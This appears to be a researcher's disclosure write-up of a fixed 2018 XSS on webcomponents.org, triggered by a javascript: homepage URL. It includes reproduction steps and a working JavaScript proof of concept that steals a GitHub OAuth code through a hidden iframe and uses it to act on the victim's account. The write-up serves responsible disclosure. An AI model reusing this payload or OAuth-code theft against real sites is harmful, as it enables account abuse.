Video:

Steps to reproduce:

1. Create a Polymer element and publish it to github

2. Set the repo homepage URL to: javascript:alert(document.domain)

3. Publish it via https://www.webcomponents.org/publish

4. Go to the element’s webcomponents.org page and click the homepage link

What can you do with this XSS:

It’s possible if the user has authenticated using github on webcomponents.org before, to get the github auth code and use it to star any public github repo behalf of the user.

It would work like this:

create an iframe with the github auth URL, and if the user is already authenticated, it redirects us to webcomponents.org and it will have the auth code in the url as ?code=123 (and we can access the iframe because it’s the same domain)

(and we can access the iframe because it’s the same domain) use the code to post a request to webcomponents.org‘s api to star a github repo using the user’s account

Here’s an example:

// create an iframe with github authorization url // that redirects us back to webcomponents.org var iframe; iframe = document.createElement('iframe'); iframe.src = 'https://github.com/login/oauth/authorize?client_id=54fc42e15038794b7011&scope=public_repo&redirect_uri=https://www.webcomponents.org/element/ThomasOrlita/test2'; iframe.style.display = 'none'; document.body.appendChild(iframe); // just wait some time till it's loaded and redirected setTimeout(() => { console.log(iframe.contentWindow.location.href); // get the url that contains the authorization code from the iframe var url = new URL(iframe.contentWindow.location.href); var code = url.searchParams.get("code"); // the github repo we want to star var repo_to_star = 'kelseyhightower/nocode'; // make a post request using the code fetch('/api/star/' + repo_to_star + '?code=' + code, { method: 'POST' }) }, 5000);

Timeline:

12.08.2018: XSS reported

16.08.2018: Added more info

20.08.2018: Accepted

22.08.2018: Fixed

ThomasOrlita.com

Follow me on Twitter: @ThomasOrlita